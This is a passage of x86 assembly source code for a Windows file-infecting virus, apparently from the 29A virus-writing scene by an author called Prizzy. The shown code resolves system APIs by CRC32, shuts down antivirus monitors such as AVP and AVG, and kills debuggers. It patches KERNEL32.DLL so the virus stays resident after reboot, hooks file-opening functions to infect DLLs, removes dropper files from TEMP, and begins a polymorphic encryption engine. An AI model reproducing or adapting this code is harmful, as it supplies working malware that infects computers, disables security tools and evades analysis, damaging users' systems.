			;     ECX ... number of bytes to read
			;     EDX ... destination buffer
			;     ESI ... file pos
			;     EBX ... file handle
			;   output:
			;     ECX ... number of reader bytes, CFlags

		call	__MySeekFile		;change file pos
		pusha
		xor	eax,eax
		push	ecx			;save for later using...
		push	eax			;support 2^64-2 bigger file ?
		lea	eax,[ebp+last_error]
		push	eax			;real readed bytes
		push	ecx
		push	edx
		push	ebx
		call	[ebp+ddReadFile]
		pop	[esp].access_ecx	;save old ECX to PUSHAD
		popa
		cmp	ecx,[ebp+last_error]
		jnz	$+3			;jump if STC, if not CLC :)
		test	al,0F9h 		;hidden STC instruction
		mov	ecx,[ebp+last_error]
		ret

__MyWriteFile:		; write some bytes (ECX) to certain filepos (ESI)
			; from buffer (EDX) by handle (EBX)
			;   input:
			;     ECX ... number of bytes to write
			;     EDX ... source buffer
			;     ESI ... file pos
			;     EBX ... file handle

		call	__MySeekFile
		pusha
		xor	eax,eax
		push	ecx			;save for later using...
		push	eax			;file bigger then 2^64-2 ?
		lea	eax,[ebp+last_error]
		push	eax
		push	ecx			;number of bytes to write
		push	edx			;source buffer
		push	ebx			;file handle
		call	[ebp+ddWriteFile]
		pop	[esp].access_ecx
		popa
		cmp	ecx,[ebp+last_error]
		jnz	$+3			;jump if STC, if not CLC :)
		test	al,0F9h 		;hidden STC instruction
		mov	ecx,[ebp+last_error]
		ret

__MySeekFile:		; seek in the file
			;   input:
			;     ESI ... new file pos
			;     EBX ... file handle

		pusha
		xor	eax,eax
		push	eax			;FILE_BEGIN defined in "WinBase.H"
		push	eax			;support 2^64-2 file size ?
		push	esi			;new file size
		push	ebx			;file handle
		call	[ebp+ddSetFilePointer]
		popa
		ret

__MySetAttrFile:	; change file attributes
			;   input:
			;     ECX ... new file attributes
			;     EDX ... file name pointer

		pusha
		push	ecx			;new attributes
		push	edx			;file name pointer
		call	[ebp+ddSetFileAttributesA]
		mov	[esp].access_eax,eax
		popa
		or	eax,eax
		jz	$+3
		test	al,0F9h 		;hidden STC instruction
		ret

__MyCloseFile:		; close (EBX) file handle

		pusha
		push	ebx			;handle to close
		call	[ebp+ddCloseHandle]
		popa
		ret

__MyGetFileSize:	; get file size
			;   input:
			;     EBX ... file handle

		pusha
		push	00000000h		;file bigger then 2^64-2 ?
		push	ebx			;file handle
		call	[ebp+ddGetFileSize]
		mov	[esp].access_eax,eax
		popa
		cmp	eax,-1
		jz	$+3
		test	al,0F8h 		;hidden STC instruction
		ret

__MyFindFirst:		; search certain file
			;   input:
			;     EDX ... file mask
			;     ESI ... dta
			;   output:
			;     EAX ... handle, CF status

		pusha
		push	esi			;output dta
		push	edx			;file mask
		call	[ebp+ddFindFirstFileA]
		mov	[esp].access_eax,eax
		popa
		cmp	eax,-1			;were we successful ?
		jz	$+3
		test	al,0F9h 		;hidden STC instruction
		ret

__MyFindNext:		; find next file
			;   input:
			;     EAX ... handle
			;     ESI ... dta

		pusha
		push	esi			;output dta
		push	eax			;FindFirstFile handle
		call	[ebp+ddFindNextFileA]
		or	eax,eax 		;success ?
		popa
		jz	$+3
		test	al,0F9h 		;hidden STC instruction
		ret

__MyFindClose:		; close file searcher
			;   input:
			;     EAX ... handle

		pusha
		push	eax			;FindFirstFile handle
		call	[ebp+ddFindClose]
		mov	[esp].access_eax,eax
		popa
		or	eax,eax 		;success ?
		jz	$+3
		test	al,0F9h 		;hidden STC instruction
		ret


malloc: 		; allocate memory (EAX)

		pusha
		mov	ebx,eax
		push	00000000h		;name of mapping object
		push	eax			;low 32 bits of object size
		push	00000000h		;high 32 bits of object size
		push	PAGE_READWRITE
		push	00000000h		;optional security attributes
		push	-1			;no file, only shared memory
		call	[ebp+ddCreateFileMappingA]
		or	eax,eax
		jz	__malloc_failed 	;success ?

		push	ebx			;number of bytes to map
		push	00000000h		;low 32 bits of file offset
		push	00000000h		;high 32 bits of file offset
		push	FILE_MAP_WRITE		;access mode
		push	eax			;mapped object
		call	[ebp+ddMapViewOfFile]

	__malloc_failed:
		mov	[esp].access_eax,eax	;memory address or NULL
		popa
		or	eax,eax
		ret

mdealloc:		; deallocate memory (EAX)

		pusha
		push	eax			;mapped address
		call	[ebp+ddUnmapViewOfFile]
		popa
		ret

__MyCreateThread:	; create thread
			;   input:
			;     EAX ... thread function
			;     EBX ... parameter
			;   output:
			;     EAX ... thread handle

		pusha
		call	$+9			;thread identifier
		dd	?
		push	00000000h		;create flags
	__mct_continue:
		push	ebx			;parameter
		push	eax			;start address
		push	00000000h		;stack size
		push	00000000h		;security attributes
		call	[ebp+ddCreateThread]
		mov	[esp].access_eax,eax	;EAX through POPA :)
		popa
		or	eax,eax
		jz	$+3
		test	al,0F9h 		;hidden STC instruction
		ret

;ÄÄÄ´ function to get kernel's address ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function searchs functions in:
		;    * KERNEL32.DLL, USER32.DLL, ADVAPI32.DLL
		;At first I'll open library, get export table, RVA ... and
		;then I'll compare CRC32 with function names.
		;
		__fk32_inside	dd	00000000h	;library tables
		;

find_kernel32:
		mov	eax,[esp+8]		;I need kernel's address
		and	eax,0FFFF0000h
		add	eax,65536
    __scanning: sub	eax,65536
		cmp	word ptr [eax],'ZM'
		jnz	__scanning
		pusha
		mov	[ebp+kernel_base],eax
		mov	edx,eax

		; kernel's base 'MZ' address in EAX
		mov	ebx,eax
		add	eax,[eax+3ch]
		add	ebx,[eax+78h]
		mov	[ebp+__fk32_inside],ebx

		; search functions from "k32.dll, user32.dll, advapi32.dll"
		lea	ebx,[ebp+FunctionNames]
		lea	edi,[ebp+FunctionAddresses]
		mov	ecx,00000003h
	__fk32_next_library:
		push	ecx			;number of libraries
	__fk32_next_function:
		mov	esi,[ebx]		;get function's CRC32
		mov	[ebp+__sET_crc32],esi
		call	__searchET
		stosd				;write its address
		add	ebx,00000004h		;next CRC32 value
		cmp	dword ptr [ebx],00000000h ;end of functions
		jnz	__fk32_next_function	  ;of current library ?
		add	ebx,00000005h		;now, library name
		movzx	ecx,byte ptr [ebx-1]	;EAX ... length of library
		or	ecx,ecx
		jz	__fk32_finish

		push	ebx ebx 		;library name
		add	[esp+00000004h],ecx
		call	[ebp+ddLoadLibraryA]
		mov	ecx,-2			;libraries without k32
		add	ecx,[esp+00000004h]	;get number of libraries
		mov	[ebp+user32_base+ecx*4],eax
		mov	ebx,eax 		;start of file header
		mov	edx,eax
		add	eax,[eax+3ch]
		add	ebx,[eax+78h]
		mov	[ebp+__fk32_inside],ebx
		pop	ebx			;function names

		; next library ?
	__fk32_finish:
		pop	ecx
		loop	__fk32_next_library

		popa				;bye, bye K32, U32, A32...
		ret				;what a pleasure work with u!

		; search function's address
	__searchET:
		pusha
		mov	ebx,[ebp+__fk32_inside]
		mov	ecx,[ebx+32]		;search export table of
		add	ecx,edx 		;KERNEL32, searching
	__sET_next:
		mov	esi,[ecx]		;the names, then the ordinal
		add	esi,edx 		;and, finally the RVA pointerz
		call	__get_CRC32		;get name's CRC32 :)
		mov	edi,12345678h
	__sET_crc32 equ dword ptr $-4
		cmp	eax,edi 		;compare CRC32
		jz	__sET_found
		add	ecx,00000004h
		jmp	__sET_next
	__sET_found:
		sub	ecx,[ebx+32]
		sub	ecx,edx
		shr	ecx,1
		add	ecx,[ebx+36]
		add	ecx,edx
		movzx	ecx,word ptr [ecx]
		shl	ecx,2
		add	ecx,[ebx+28]
		add	ecx,edx
		mov	ecx,[ecx]
		add	ecx,edx
		mov	[esp].access_eax,ecx	;ehm, save ECX through POPA
		popa
		ret

;ÄÄÄ´ search fixed, cd-rom, ram-disk, etc. ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This  function  gets  information  about  disks.  I  call
		;GetDriveType function	to get type  of disk. You can  use
		;Win32API Help to know more  or WinBase.H (CBuilder, MSVC)
		;where you can see more flagz and their valuez. So, I  can
		;use GetLogicalDrives function, but that's one.
		;
get_disks:

		pusha
		xor	ebx,ebx
		mov	byte ptr [ebp+__disk],'A'

		; GetDriveType function...
	__gd_search:
		lea	eax,[ebp+__disk]
		push	eax
		mov	eax,[ebp+ddGetDriveTypeA]
		call	eax

		cmp	eax,00000003h		;DISK_FIXED flag
		jz	__gd_found

	__gd_new_disk:
		cmp	byte ptr [ebp+__disk],'Z'
		jz	__gd_finish
		inc	byte ptr [ebp+__disk]
		jmp	__gd_search

	__gd_found:
		mov	cl,'A'
		sub	cl,byte ptr [ebp+__disk]
		neg	cl
		mov	eax,00000001h
		shl	eax,cl			;convert to BCD
		or	ebx,eax
		jmp	__gd_new_disk

	__gd_finish:
		mov	[ebp+gdt_flags],ebx
		popa
		ret

	__disk:
		db	'A:\',0

;ÄÄÄ´ function to kill some AV monitors ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This is very interesting function how to send message	to
		;AV monitor to kill itself (AVP, AMON, AVG, AVAST monitor)
		;
kill_av_monitors:

		lea	esi,[ebp+kill_AV]	;address of strings
		xor	edi,edi
		mov	ecx,kill_AV_num 	;three monitors
	__kam_checking:
		push	ecx			;save counter
		push	esi			;AV string
		push	edi			;NULL
		call	[ebp+ddFindWindowA]
		test	eax,eax 		;found ?
		je	__kam_next_monitor
		push	edi			;send message to AV monitor
		push	edi			;to kill itself :)
		push	00000012h
		push	eax
		call	[ebp+ddPostMessageA]	;kill it, hehe :)
	__kam_next_monitor:
		@endsz				;next monitor
		pop	ecx
		loop	__kam_checking
		ret

;ÄÄÄ´ function to kill some debuggers ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function checks whether some debuggers are active.
		;I use these methods:
		;   * IsDebuggerPresent, kill SoftICE, kill TD32, etc.
		;
		;this code has been stolen from Benny's source, hi Benny :)
		;
kill_debuggers:

		; check standard debugger
		mov	eax,[ebp+ddIsDebuggerPresent]
	IFNDEF DEBUG
		call	eax			;check debug...
		or	eax,eax
		jnz	__kd_found
	ENDIF

		; check whether SoftICE 95/98/NT/2000 is active
		lea	edx,[ebp+kill_SoftICE]
		call	__MyOpenFile
		jnc	__kd_found
		lea	edx,[ebp+kill_SoftICE_NT]
		call	__MyOpenFile
		jnc	__kd_found

		; check others debuggers
		mov	eax,fs:[20h]
		or	eax,eax
	IFNDEF DEBUG
		jnz	__kd_found
	ENDIF
		ret

	__kd_found:
		xor	esp,esp 		;im sorry :)
		ret

;ÄÄÄ´ function to infect KERNEL32.DLL ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function have to infect "KERNEL32.DLL" to this virus
		;become memory resident.
		;
		;I would like to thank;
		;   * Lord Julus/29A for his article about this in VxTasy.
		;
		__ik_system	dd	00000000h	;system directory
		__ik_window	dd	00000000h	;window directory
		__ik_wininit	db	'\WININIT.INI',0
		__ik_nul	db	'NUL',0
		__ik_rename	db	'Rename',0	;section name
		;
infect_kernel:

		; allocate memory for SYSTEM and WINDOWS directory
		mov	eax,filename_size
		call	malloc
		mov	[ebp+__ik_system],eax
		mov	eax,filename_size
		call	malloc
		mov	[ebp+__ik_window],eax

		; find SYSTEM directory
		push	filename_size
		push	[ebp+__ik_system]
		call	[ebp+ddGetSystemDirectoryA]

		; find WINDOWS directory
		push	filename_size
		push	[ebp+__ik_window]
		call	[ebp+ddGetWindowsDirectoryA]

		; copy \WINDOWS\SYSTEM + \KERNEL32.DLL
		lea	eax,[ebp+kernel_name]
		push	eax eax
		push	[ebp+__ik_system]
		call	[ebp+ddlstrcat]

		; copy \WINDOWS + \KERNEL32.DLL
		push	[ebp+__ik_window]
		call	[ebp+ddlstrcat]

		; copy KERNEL32.DLL from SYSTEM directory to '..'
		push	00000000h		;rewrite it
		push	[ebp+__ik_window]	;new filepath
		push	[ebp+__ik_system]	;actual filename
		call	[ebp+ddCopyFileA]
		or	eax,eax 		;if error, we're probably
		jz	__ik_fault		;in memory :)

		mov	eax,[ebp+__ik_window]
		mov	[ebp+filename_ptr],eax
		mov	[ebp+it_is_kernel],01h	;infect kernel flag
		call	infect_file

		; check system version Win9X or WinNT/2k ?
		call	[ebp+ddGetVersion]
		bt	eax,3Fh 		;get last bit
		jnc	__ik_nt2k		;jump if WinNT/2k
		push	[ebp+__ik_window]
		call	[ebp+ddlstrlen]
		xchg	edi,eax
		inc	edi
		push	filename_size
		push	[ebp+__ik_window]
		add	[esp],edi
		call	[ebp+ddGetWindowsDirectoryA]
		lea	eax,[ebp+__ik_wininit]	;wininit file name
		push	eax
		push	[ebp+__ik_window]
		add	[esp],edi
		call	[ebp+ddlstrcat] 	;window_dir + wininit

		; create WININIT.INI file and update one !
		push	[ebp+__ik_window]
		add	[esp],edi
		push	[ebp+__ik_system]	;existing KERNEL32.DLL
		lea	eax,[ebp+__ik_nul]
		push	eax
		lea	eax,[ebp+__ik_rename]
		push	eax
		call	[ebp+ddWritePrivatePFStringA]

		; build the rename INI instruction
		push	[ebp+__ik_window]	;wininit path
		add	[esp],edi
		push	[ebp+__ik_window]	;infected/old k32
		push	[ebp+__ik_system]	;new k32 path
		lea	eax,[ebp+__ik_rename]	;rename section
		push	eax
		call	[ebp+ddWritePrivatePFStringA]
		jmp	__ik_fault
	__ik_nt2k:
		push	00000005h		;after reboot, replace
		push	[ebp+__ik_system]	;new k32 path
		push	[ebp+__ik_window]	;old k32 path
		call	[ebp+ddMoveFileExA]

	__ik_fault:
		mov	eax,[ebp+__ik_window]
		call	mdealloc
		mov	eax,[ebp+__ik_system]
		call	mdealloc
		mov	[ebp+it_is_kernel],00h
		ret

;ÄÄÄ´ hooked functions ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

myCreateFileW:	      db 0E8h,hookInfectFile-$-3,0,0,0,68h,?,?,?,?,0C3h
myCreateFileA:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h
myOpenFile:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h
my_lopen:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h

myCopyFileW:	      db 0E8h,hookInfectFile-$-3,0,0,0,68h,?,?,?,?,0C3h
myCopyFileA:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h
myMoveFileW:	      db 0E8h,hookInfectFile-$-3,0,0,0,68h,?,?,?,?,0C3h
myMoveFileA:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h
myMoveFileExW:	      db 0E8h,hookInfectFile-$-3,0,0,0,68h,?,?,?,?,0C3h
myMoveFileExA:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h

myLoadLibraryW	      db 0E8h,hookInfectFile-$-3,0,0,0,68h,?,?,?,?,0C3h
myLoadLibraryA:       db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h
myLoadLibraryExW:     db 0E8h,hookInfectFile-$-3,0,0,0,68h,?,?,?,?,0C3h
myLoadLibraryExA:     db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h
myFreeLibrary:	      db 0E8h,hookInfectFile-$-4,0,0,0,68h,?,?,?,?,0C3h

EndOfNewFunctions	equ	this byte

;ÄÄÄ´ common hooked functions ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function is runned from kernel32 file, first time do
		;    * clear some valuez, bufferz
		;    * delete files in \TEMP\ (droppers)
		;    * create "already resident" flag (mutex)
		;    * inicialize "Hyper Infection" (SetTimer)
		;    * create a crypto thread
		;    * get actual process ID
		;Then if I'll catch "FreeLibrary" function, I'll do:
		;    * call "crypto_get_library" (more info there)
		;And If I'll catch "LoadLibrary, CreateFile, ..." function
		;    * is it a DLL file
		;    * call "crypto_thread" by CT_DECRYPTFILE flag
		;
		;We might say this function is the most important in virus
		;many problems were here.
		;
hookInfectFile:

		; prepare for UniCode functions
		test	al,0F9h 		;hidden STC instruction

	IFDEF DEBUG				;my SoftICE breakpoint
		int	4			;many battles were here
	ENDIF

		pusha				;save all registers
		pushf				;save all flags
		pushf
		call	get_base_ebp		;get delta offset
		popf
		jnc	__hif_no_stop		;ansi version
		call	unicode2ansi
		jz	__hif_finish		;no bytes converted ?
		jmp	__hif_continue

		; test whether "Prizzy Hyper Infection" has been actived...
	__hif_no_stop:
		cmp	dword ptr [ebp+HyperInfection_k32],00000000h
		jnz	__hif_continue
		call	clear_valuez		;clear archive structures
		call	clear_temp_droppers	;delete temp file trom \TEMP\
		call	create_mutex		;already resident
		call	hookHyperInfection	;inicialize "HyperInfection"
		lea	eax,[ebp+crypt_thread]	;create common crypt thread
		mov	ebx,ebp 		;...and its parameter
		call	__MyCreateThread
		mov	[ebp+crypto_mainThread],eax
		call	[ebp+ddGetCurrentProcessId] ;get process ID number
		mov	[ebp+crypto_mainProcId],eax
		mov	[ebp+crypto_thread],CT_LOADKEY	;load cryptography
		mov	[ebp+crypto_thread_err],'!A92'	;key and wait then
	__hif_crLoadKey:
		push	50			;active thread to load crypto
		push	[ebp+crypto_mainThread] ;key
		call	[ebp+ddWaitForSingleObject]
		cmp	[ebp+crypto_thread_err],'!A92'
		jz	__hif_crLoadKey

		; which type of function is called ?
	__hif_continue:
		lea	eax,[ebp+myCreateFileW] ;start of table
		sub	eax,[esp+00000024h]	;return address
		neg	eax
		sub	eax,00000005h		; - call instruction
		mov	ebx,(offset myCreateFileA - offset myCreateFileW)
		cdq
		div	ebx			;get number of function
		cmp	ax,000Eh		;FreeLibrary ?
		jz	crypt_get_library

		; get filename length
	__hif_get_flen:
		mov	esi,[esp+0000002Ch]	;get file name
		push	esi
		call	[ebp+ddlstrlen] 	;not including null terminator
		or	eax,eax 		;zero length
		jz	__hif_finish
		inc	eax			; + zero char

		; copy filename to the buffer
		lea	edi,[ebp+filename]	;destination buffer
		mov	[ebp+filename_ptr],edi
		mov	ecx,eax 		;filename length
		rep	movsb

		; upcase characters
		push	eax			;number of characters
		push	[ebp+filename_ptr]	;filename
		call	[ebp+ddCharUpperBuffA]	;convert to uppercase

		; CreateFile, OpenFile, CopyFile, MoveFile, ...
		lea	esi,[ebp+filename]	;find the end of filename
		mov	[ebp+filename_ptr],esi
		@endsz				;ehm :)

		; use crypto thread to decrypt file
		cmp	[esi-5],'LLD.'		;DLL file ?
		jnz	__hif_finish		;or not ?
		cmp	[ebp+crypto_thread_err],'!A92'
		jz	__hif_finish		;other process ?
		mov	[ebp+crypto_thread],CT_DECRYPTFILE
		mov	[ebp+crypto_thread_err],'!A92'
		push	[ebp+crypto_mainProcId] ;active the process where I
		push	00000000h		;created my thread, I can't
		push	00000001h		;call thread for other pro-
		call	[ebp+ddOpenProcess]	;cess, so I have to active
		push	eax			;its and then go back, mul-
	__hif_cDecryptFile:			;titasking world !!!
		push	50
		push	dword ptr [esp+00000004h]
		call	[ebp+ddWaitForSingleObject]
		cmp	[ebp+crypto_thread_err],'!A92'
		jz	__hif_cDecryptFile	;crypto thread must decrypt
		call	[ebp+ddCloseHandle]	;in stack is its handle

	__hif_finish:
		popf
		popa
		ret

;ÄÄÄ´ start HyperInfection inside KERNEL32.DLL ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;Before then I will start I must load "USER32", "ADVAPI32"
		;libraries and	re-write all my function offsets. I do NOT
		;exactly know whether it  must be but when I'll load these
		;libraries sometimes later I should get  other offset then
		;after 1st running. Next, I must  install  timer on "Hyper
		;Infection" function.
		;
hookHyperInfection:

		; load "USER32.DLL" library
		lea	eax,[ebp+user32_name]	;library name
		call	[ebp+ddLoadLibraryA], eax
		or	eax,eax 		;failed ?
		jz	__hhi_finish
		mov	ebx,eax

		; load "ADVAPI32.DLL" library
		lea	eax,[ebp+advapi32_name] ;library name
		call	[ebp+ddLoadLibraryA], eax
		or	eax,eax 		;failed ?
		jz	__hhi_finish

		; decrease/increase function bases
		cmp	dword ptr [ebp+crypto_Action],00000000h
		jz	__hhi_no_cryptography
		sub	eax,[ebp+advapi_base]	;new memory position
		mov	ecx,(HookedAddresses_user32 - \
			     HookedAddresses_advapi32) / 4
		lea	esi,[ebp+HookedAddresses_advapi32]
	__hhi_modify_advapi32:
		add	[esi],eax
		loop	__hhi_modify_advapi32
	__hhi_no_cryptography:
		sub	ebx,[ebp+user32_base]	;new memory position
		mov	ecx,(FunctionNames - HookedAddresses_user32) / 4
	__hhi_modify_user32:
		add	[esi],ebx
		loop	__hhi_modify_user32

		; set timer to the Prizzy Hyper Infection for API, "PHI-API"
		lea	eax,[ebp+init_search]	;main function
		push	eax
		push	3000			;every 3 seconds :)
		push	00000000h		;timer identifier
		push	00000000h		;hwnd
		call	[ebp+ddSetTimer]
		or	eax,eax
		jz	__hhi_finish

		mov	[ebp+HyperInfection_timerID],eax
		mov	byte ptr [ebp+search_start],00h  ;PHI didnt begin

	__hhi_finish:
		mov	dword ptr [ebp+HyperInfection_k32],00000001h
		ret

;ÄÄÄ´ finish HyperInfection inside KERNEL32.DLL ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

hookHyperInfection_Done:

		; remove timer
		push	dword ptr [ebp+HyperInfection_timerID]
		call	[ebp+ddKillTimer]
		ret

;ÄÄÄ´ common standard functions ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;After every start  of windows I compress some programs to
		;TEMP directory (usually four new achives). And every win-
		;dows run I have to delete them.
		;
		__ctd_memory	dd	00000000h	;place in memory
		__ctd_fmask	db	'29A*.TMP',0	;file mask
		__ctd_fmask_len equ this byte - __ctd_fmask
		;
clear_temp_droppers:

		; allocate moemory for TEMP directory
		mov	eax,filename_size
		call	malloc
		mov	[ebp+__ctd_memory],eax

		; get two TEMP directory
		push	eax			;outta buffer
		push	filename_size
		call	[ebp+ddGetTempPathA]
		or	eax,eax 		;give me filepath length
		jz	__ctd_dealloc

		; copy filemask in the end of filename
		lea	esi,[ebp+__ctd_fmask]	;file mask
		mov	edi,[ebp+__ctd_memory]	;outta buffer
		add	edi,eax 		; + length of dir name
		mov	ecx,__ctd_fmask_len	;length of file mask
		rep	movsb			;copy me, my lord :) !

		; search them
		mov	ebx,eax
		lea	esi,[ebp+dta]		;i can use "infect_file" dta
		mov	edx,[ebp+__ctd_memory]	;temp directory + file mask
		call	__MyFindFirst
		jc	__ctd_dealloc

		; delete file
	__ctd_next_file:
		push	eax			;find handle
		lea	esi,[ebp+dta.dta_filename]
		mov	edi,[ebp+__ctd_memory]
		add	edi,ebx 		; + length of dir name
		@copysz 			;ahhh, JQwerty's macro :)

		push	[ebp+__ctd_memory]	;filename
		call	[ebp+ddDeleteFileA]

		; search next file
		pop	eax			;find handle
		lea	esi,[ebp+dta]		;dta
		call	__MyFindNext
		jnc	__ctd_next_file

		; close find handle
		call	__MyFindClose		;find next file !

	__ctd_dealloc:
		mov	eax,[ebp+__ctd_memory]
		call	mdealloc
	__ctd_failed:
		ret

		;---------------------------------------------------------
		;Clear all archive structures, all droppers, all programs.
		;
clear_valuez:
		xor	eax,eax
		lea	edi,[ebp+NewArchive]
		mov	ecx,NewArchiveNum * (NewArchiveSize / 4)
		rep	stosd

		; set libraries memory, info
		mov	dword ptr [ebp+file_infected],00000000h
		mov	eax,100 * 4
		call	malloc
		mov	[ebp+crypto_library],eax
		mov	dword ptr [ebp+crypto_nLib],00000000h

		; clear HyperTable
		lea	esi,[ebp+HyperTable]
	__cv_repeat:
		lodsb				;name or extension or end ?
		cmp	al,0FFh
		jz	__cv_finish
		call	[ebp+ddlstrlen], esi	;get filename
		inc	eax			;zero char
		add	esi,eax
		mov	byte ptr [esi],00h	;search flag !
		add	esi,HyperTable_HalfSize
		jmp	__cv_repeat
	__cv_finish:
		ret

		;---------------------------------------------------------
		;Convert Unicode filename to Ansi version.
		;
unicode2ansi:

		lea	eax,[esp+00000034h]	;UniCode filename
		lea	ebx,[ebp+filename]
		push	00000000h		;don't tell me about problem
		push	00000000h		;ignore unmappable characters
		push	MAX_PATH		;how many bytes to allocate
		push	ebx			;destination buffer
		push	-1			;calculate strlen(string)+1
		push	eax			;filename in unicode
		push	00000000h		;no composite characters
		push	CP_ACP
		call	[ebp+ddWideCharToMultiByte]
		or	eax,eax
		ret

		;---------------------------------------------------------
		;Create mutex or get "already resident" flag.
		;
		;  output: (C)arry flag
		;
create_mutex:
		pusha
		lea	eax,[ebp+crypto_mutex]	;mutex name
		push	eax
		push	00000001h		;owner
		push	00000000h		;mutex attributes
		call	[ebp+ddCreateMutexA]
		push	eax
		call	[ebp+ddGetLastError]	;already resident ?
		mov	ebx,eax
		or	ebx,ebx
		jz	__cm_finish
		call	[ebp+ddReleaseMutex]
		push	eax
	__cm_finish:
		pop	eax
		mov	[esp].access_eax,ebx
		or	ebx,ebx 		;already resident ?
		jnz	__cm_failed
		test	al,0F9h 		;hidden STC instruction
	__cm_failed equ $-1
		popa
		ret

;ÄÄÄ´ getting address ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;Get delta offset to EBP. The second SUB instruction sub-
		;tract "virus_start". So then I can only use:
		;     *  LEA   EAX,[EBP+pe_header]
		;instead
		;     *  LEA   EAX,[EBP+pe_header - virus_start]
		;

get_base_ebp:					;get address where we're
		call	$+5
		pop	ebp
		sub	ebp,$-1-virus_start
		sub	ebp,offset virus_start
		ret

;ÄÄÄ´ Prizzy Polymorphic Engine II (PPE-II) ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function generate polymorphic engine with:
		;    * brute-attack algorithm
		;    * random multi-layer engine
		;Please find "ppe_*" functions to know more, thanks.
		;
		;
		__ppe_st_flags	 dw	?	;input of tbl_encode_loop
		__ppe_st_items	 db	?	;items in table
		__ppe_st_o_table dd	?	;offset to the table (part)
		;
ppe_startup:

		; save all registers
		pusha

		; clear tables of (base-register / garbages / JNZ ... )
		mov	byte  ptr [ebp+used_regs      ],00h
		mov	byte  ptr [ebp+recursive_level],00h
		mov	byte  ptr [ebp+compare_index  ],00h
		mov	byte  ptr [ebp+gl_index_reg   ],-1
		mov	dword ptr [ebp+__pllg_memory  ],00000000h

		; set style of garbages (based+flags)
		mov	byte  ptr [ebp+garbage_style  ],not USED_FLAGS

		; copy virus body to the allocated memory
		lea	esi,[ebp+virus_start]
		mov	edi,[ebp+mem_address]
		mov	ecx,file_size
		rep	movsb

		; clear two SoftICE final breakpoints
		mov	eax,[ebp+mem_address]
		mov	word ptr [eax+__final_SoftICE_1-virus_start],9090h
		mov	word ptr [eax+__final_SoftICE_2-virus_start],9090h

		; load address of the start of poly-decoder
		mov	edi,[ebp+poly_start]

		; clear table
		xor	ebx,ebx
		mov	ecx,00000005h
		lea	esi,[ebp+tbl_encode_loop]
	__ppes_clear_table:
		lodsw
	__ppes_clear_item:
		mov	dword ptr [esi],ebx
		add	esi,00000008h
		dec	al
		jnz	__ppes_clear_item
		dec	ecx
		jnz	__ppes_clear_table

		; get global_index_reg
		call	ppe_get_empty_reg
		call	__reg_to_bcd
		mov	[ebp+gl_index_reg2],al
		or	[ebp+used_regs],ah

		; get index_reg --> (xor,sub...) [index_reg], reg32
	__ppes_new_ireg:
		call	ppe_get_empty_reg
		cmp	al,00000101b		;EBP isn't supported
		jz	__ppes_new_ireg
		call	__reg_to_bcd
		mov	[ebp+index_reg],al
		or	[ebp+used_regs],ah

		; get code reg --> (xor,sub...) [---], code_reg
	__ppes_new_creg:
		call	ppe_get_empty_reg
		test	al,00000100b		;only 8 bits reg
		jnz	__ppes_new_creg
		call	__reg_to_bcd
		mov	[ebp+code_reg],al
		or	[ebp+used_regs],ah

		; get mlayer pointer --> mov reg8, [gl_index_reg+mpointer]
	__ppes_new_lreg:
		call	ppe_get_empty_reg
		cmp	al,00000101b		;EBP isn't supported
		jz	__ppes_new_lreg
		mov	[ebp+mlayer_reg],al

		; generate initial code value
		call	ppe_get_rnd32
		mov	[ebp+code_value],eax
		call	ppe_get_rnd32
		mov	[ebp+code_value_add],eax

		; select style (add/sub/xor)
		mov	eax,00000003h
		call	ppe_get_rnd_range
		mov	[ebp+crypt_style],al

		; clear used registers (this isn't right time)
		mov	byte ptr [ebp+used_regs],00h

		; choose subroutine
		xor	ebx,ebx
		mov	ecx,00000005h
		lea	esi,[ebp+tbl_encode_loop]
	__ppes_choose:
		lodsw				;AH=random?, AL=items
		mov	[ebp+__ppe_st_flags  ],ax
		mov	[ebp+__ppe_st_items  ],al
		mov	[ebp+__ppe_st_o_table],esi
		or	ah,ah			;random ? JZ if not
		jnz	__ppes_crun
	__ppes_cnext:
		mov	esi,[ebp+__ppe_st_o_table]
